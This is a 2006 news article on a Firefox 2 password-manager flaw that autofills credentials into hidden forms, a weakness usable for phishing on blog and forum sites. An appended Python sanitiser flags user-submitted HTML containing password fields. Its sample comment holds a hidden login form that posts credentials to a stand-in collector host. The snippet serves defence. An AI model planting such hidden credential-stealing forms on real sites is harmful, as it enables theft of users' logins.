Firefox 2 Password Manager Flaw

Aron Schatz
November 22, 2006

Firefox's saved-password manager has a bug: Firefox will fill in saved credentials even in forms that are hidden from the user. That can be used very easily in a phishing attack.


RCSR (reverse cross-site request) attacks are also actively targeting Microsoft Internet Explorer; however, a flaw in Firefox makes the attack much more likely to succeed. The Password Manager component of Firefox can be exploited to send a username and password combination to an attacker's computer without the user's knowledge. Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses.
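For operators of the blog and forum sites mentioned above, one server-side check is to reject user-submitted markup that contains a password field, whether or not the form is visible. The following is an added example, not code from the original article or from Mozilla; the function name `audit_user_html`, the hosts `forum.example` and `collector.example`, and the sample comment are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAudit(HTMLParser):
    """Records every password field found in a fragment of user-submitted HTML."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []   # one dict per form (or stray input) with a password field
        self._form = None    # the <form> currently open, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._finish_form()          # tolerate a missing </form>
            self._form = {"action": a.get("action", ""), "password": False}
        elif tag == "input" and a.get("type", "").strip().lower() == "password":
            if self._form is None:       # password input outside any form
                self.findings.append({"action": "", "offsite": False})
            else:
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._finish_form()

    def _finish_form(self):
        if self._form and self._form["password"]:
            action = self._form["action"].strip()
            # A relative or empty action submits to the site itself.
            host = (urlparse(action).hostname or self.site_host).lower()
            self.findings.append({"action": action, "offsite": host != self.site_host})
        self._form = None


def audit_user_html(fragment, site_host):
    """Return findings; visibility (CSS, size) is deliberately not considered,
    because a form can be hidden in too many ways to enumerate."""
    parser = FormAudit(site_host)
    parser.feed(fragment)
    parser.close()
    parser._finish_form()                # form left open at end of input
    return parser.findings


# Constructed sample: a forum comment carrying a hidden login form.
SAMPLE_COMMENT = (
    '<p>Great post!</p>'
    '<form action="https://collector.example/save" style="display:none">'
    '<input name="user"><input type="password" name="pass"></form>'
)
```

Any non-empty result is grounds to refuse or strip the submission; the `offsite` flag only helps triage which submissions would have sent credentials to another host.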


